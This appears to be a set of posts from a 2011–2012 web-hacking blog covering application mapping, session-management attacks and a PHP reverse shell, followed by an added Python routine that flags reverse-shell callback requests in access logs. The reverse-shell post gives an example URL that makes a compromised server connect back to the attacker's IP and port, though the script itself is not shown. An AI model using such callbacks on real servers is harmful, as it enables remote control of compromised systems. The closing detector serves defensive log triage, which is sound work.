Thursday, 29 March 2012

Mapping The Application

The first step in the process of attacking an application is gathering some key information about it to gain a better understanding of what you are up against. The mapping exercise begins by enumerating the application's content and functionality to understand what the web application does and how it behaves. Much of this functionality is easy to identify, but some of it may be hidden, requiring a degree of guesswork and luck to discover.




  • Enumerating Content and Functionality 
In a typical web application, the majority of content and functionality can be identified via manual browsing, as shown below:

Wednesday, 29 February 2012

ATTACKING SESSION MANAGEMENT


The session management mechanism is a fundamental security component in the majority of web applications. It is what enables the application to uniquely identify a given user across a number of different requests, and to handle the data that it accumulates about the state of that user's interaction with the application. Where an application implements login functionality, session management is of particular importance, as it is what enables the application to persist its assurance of any given user's identity beyond the request in which they supply their credentials.

Now I'll show you how to attack session management in a web application and do some privilege escalation on it.

Tuesday, 06 December 2011

PHP Reverse Shell On Linux Server

If you are attacking a website and have successfully compromised it, you have to connect back from the web server machine to your local machine for future attacks. I have one simple PHP script to do that; you only enter your IP address and your port in the URL to connect back. For example:

http://192.168.56.101/rs.php?ip=192.168.56.1&port=1234

Here 192.168.56.101 is the target IP, the script is called rs.php, and the ip and port variables are those of your local machine.
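From the defender's side, a request of the shape shown above leaves a distinctive trace in the web server's access log: a PHP script called with an IP literal and a port number in the query string. The following is an added example, not code from this post; the log lines are constructed, and the parameter-name sets and the combined log format are assumptions.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (combined log format assumed), for illustration only.
SAMPLE_LOG = """\
192.168.56.1 - - [06/Dec/2011:10:01:02 +0700] "GET /rs.php?ip=192.168.56.1&port=1234 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.56.7 - - [06/Dec/2011:10:02:10 +0700] "GET /index.php?page=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.56.7 - - [06/Dec/2011:10:03:44 +0700] "GET /search.php?q=port&ip=abc HTTP/1.1" 200 812 "-" "Mozilla/5.0"
192.168.56.9 - - [06/Dec/2011:10:04:00 +0700] "POST /upload.php?host=10.0.0.5&PORT=4444 HTTP/1.1" 200 0 "-" "curl/7.21"
"""

# client, timestamp, method, request target, status
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# Assumed parameter names; "ip" and "port" are the ones used in the post's URL.
HOST_KEYS = {"ip", "host", "addr"}
PORT_KEYS = {"port"}

def _is_ip(value):
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False

def _is_port(value):
    return value.isascii() and value.isdigit() and 0 < int(value) <= 65535

def _pick(params, keys, ok):
    # First value under any matching key (case-insensitive) that passes validation.
    return next((v for k, vs in params.items() if k.lower() in keys
                 for v in vs if ok(v)), None)

def find_callback_requests(log_text):
    """Return requests to .php scripts that carry both an IP literal and a port."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        client, when, method, target, status = m.groups()
        url = urlsplit(target)
        params = parse_qs(url.query)
        host, port = _pick(params, HOST_KEYS, _is_ip), _pick(params, PORT_KEYS, _is_port)
        if host and port and url.path.lower().endswith(".php"):
            hits.append({"client": client, "time": when, "method": method, "path": url.path,
                         "host": host, "port": int(port), "status": int(status)})
    return hits
```

Hits are leads for triage, not verdicts: a legitimate admin or monitoring page can take the same parameters, so check whether the flagged script belongs to the deployed application.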